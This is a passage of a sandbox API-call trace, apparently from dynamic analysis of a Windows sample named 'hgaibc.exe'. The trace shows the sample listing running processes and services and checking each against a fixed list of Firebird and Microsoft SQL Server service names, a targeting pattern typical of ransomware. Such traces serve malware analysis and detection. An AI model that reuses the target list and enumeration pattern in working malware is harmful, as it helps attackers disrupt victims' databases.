(lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0191.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0191.871] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0191.871] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0191.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0191.871] lstrlenW (lpString="SecurityHealthService") returned 21 [0191.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0191.871] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0191.871] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0191.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0191.871] lstrlenW (lpString="SENS") returned 4 [0191.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0191.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0191.871] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0191.871] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0191.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0191.871] lstrlenW (lpString="ShellHWDetection") returned 16 [0191.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.871] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0191.871] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0191.871] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0191.871] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0191.871] lstrlenW (lpString="Spooler") returned 7 [0191.871] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0191.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0191.872] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0191.872] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0191.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0191.872] lstrlenW (lpString="StateRepository") returned 15 [0191.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0191.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0191.872] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0191.872] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0191.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0191.872] lstrlenW (lpString="SysMain") returned 7 [0191.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0191.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0191.872] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0191.872] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0191.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0191.872] lstrlenW (lpString="SystemEventsBroker") returned 18 [0191.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0191.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0191.872] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0191.872] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0191.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0191.872] lstrlenW (lpString="Themes") returned 6 [0191.872] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0191.872] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0191.872] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0191.872] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0191.872] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0191.873] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0191.873] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0191.873] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0191.873] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0191.873] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0191.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0191.876] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.877] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.877] lstrlenW (lpString="System") returned 6 [0191.878] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.878] lstrlenW (lpString="smss.exe") returned 8 [0191.878] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.879] lstrlenW (lpString="csrss.exe") returned 9 [0191.879] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.880] lstrlenW (lpString="wininit.exe") returned 11 [0191.880] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.881] lstrlenW (lpString="csrss.exe") returned 9 [0191.881] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.881] lstrlenW (lpString="winlogon.exe") returned 12 [0191.881] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.882] lstrlenW (lpString="services.exe") returned 12 [0191.882] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.883] lstrlenW (lpString="lsass.exe") returned 9 [0191.883] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0191.884] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0191.884] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0191.884] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0191.885] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.885] lstrlenW (lpString="svchost.exe") returned 11 [0191.885] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.886] lstrlenW (lpString="svchost.exe") returned 11 [0191.886] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.887] lstrlenW (lpString="dwm.exe") returned 7 [0191.887] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.888] lstrlenW (lpString="svchost.exe") returned 11 [0191.888] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.888] lstrlenW (lpString="svchost.exe") returned 11 [0191.888] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.889] lstrlenW (lpString="svchost.exe") returned 11 [0191.889] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.890] lstrlenW (lpString="svchost.exe") returned 11 [0191.890] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.891] lstrlenW (lpString="svchost.exe") returned 11 [0191.891] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.892] lstrlenW (lpString="svchost.exe") returned 11 [0191.892] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.893] lstrlenW (lpString="svchost.exe") returned 11 [0191.893] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.893] lstrlenW (lpString="svchost.exe") returned 11 [0191.893] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.894] lstrlenW (lpString="svchost.exe") returned 11 [0191.894] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.895] lstrlenW (lpString="svchost.exe") returned 11 [0191.895] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.896] lstrlenW (lpString="spoolsv.exe") returned 11 [0191.896] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.896] lstrlenW (lpString="svchost.exe") returned 11 [0191.896] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.897] lstrlenW (lpString="audiodg.exe") returned 11 [0191.897] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0191.897] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0191.898] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0191.898] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0191.898] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0191.899] lstrlenW (lpString="Memory Compression") returned 18 [0191.899] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.899] lstrlenW (lpString="sihost.exe") returned 10 [0191.899] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.900] lstrlenW (lpString="svchost.exe") returned 11 [0191.900] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0191.901] lstrlenW (lpString="msoia.exe") returned 9 [0191.901] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.901] lstrlenW (lpString="taskhostw.exe") returned 13 [0191.901] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.902] lstrlenW (lpString="explorer.exe") returned 12 [0191.902] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.902] lstrlenW (lpString="SearchUI.exe") returned 12 [0191.902] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.903] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0191.903] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.904] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0191.904] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.904] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0191.904] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0191.905] lstrlenW (lpString="hgaibc.exe") returned 10 [0191.905] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0191.906] CloseHandle (hObject=0x358) returned 1 [0191.906] Sleep (dwMilliseconds=0x1f4) [0194.435] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef20 [0194.435] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0194.436] GetLastError () returned 0xea [0194.436] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0194.436] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0194.436] CloseServiceHandle (hSCObject=0x6bef20) returned 1 [0194.436] lstrlenW (lpString="Appinfo") returned 7 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0194.437] lstrlenW (lpString="AppXSvc") returned 7 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0194.437] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0194.437] lstrlenW (lpString="Audiosrv") returned 8 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0194.437] lstrlenW (lpString="BFE") returned 3 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0194.437] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0194.437] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0194.437] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0194.437] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0194.437] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0194.437] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0194.438] lstrlenW (lpString="CDPSvc") returned 6 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0194.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0194.438] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0194.438] lstrlenW (lpString="ClickToRunSvc") returned 13 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0194.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0194.438] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0194.438] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0194.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0194.438] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0194.438] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0194.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0194.438] lstrlenW (lpString="CryptSvc") returned 8 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0194.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0194.438] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0194.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0194.438] lstrlenW (lpString="DcomLaunch") returned 10 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0194.438] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0194.438] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0194.438] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0194.438] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0194.438] lstrlenW (lpString="DeviceAssociationService") returned 24 [0194.438] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0194.438] lstrcmpiW 